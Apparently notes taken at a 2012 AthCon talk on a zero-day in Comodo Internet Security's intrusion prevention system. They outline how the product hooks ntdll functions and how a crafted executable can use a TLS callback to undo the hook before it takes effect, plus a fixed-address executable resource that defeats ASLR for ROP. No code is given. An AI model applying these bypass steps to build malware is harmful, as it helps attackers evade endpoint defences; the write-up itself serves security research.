athcon.org
Athens, 3-4 May, 2012
Day1, Track1, 18:00-18:50
"0-Day - Comodo did it again"
Glafkos Chralambous & George Nicolaou 

0-Day - Comodo did it again

Comodo Internet Security Home Intrusion Prevention System

Disclosure timeline
    bottom line, they hung up the phone while waiting for their director

Comodo techniques
    hook Nt* and Zw* functions for
        file access
        memory access
        network access
        registry access
    placed the hooks on the "wrong" side (what does this exactly mean?)

How?
    inject a pyaload to install hooks in critical user mode functions in ntdll.dll
    load a library guard.dll which installs the hooks
    in win 7 64bit: replaces the first instr of the program's EP with a JMP <payload>
    in other OS: replaces ZwTestAlert first instruction with JMP <payload>

0day
    There is TLS (Thread Local Storage)
    We can use the TLS to uninstall JMP <payload> when the main thread is created
    see _IMAGE_TLS_DIRECTORY32 structure
        AddressOfIndex
        AddressOfCallBacks; // PIMAGE_TLS_CALLBACK * - this is an interesting array

Process of exploitation
    Create a malicious executable
    find somewhere to insert IMAGE_TLS_DIRECTORY and code to uninstall the JMP <payload> instruction (and insert it)
    Point a TLS callback function to the code

That’s not all
    The <payload> address is constant address throughout all installations of the COMODO HIPS in ALL Windows OS
    Add resource 71B00000
    And it contains executable code
    Game over ASLR - can be used for ROP techniques from any other vulnerable application on the victim machine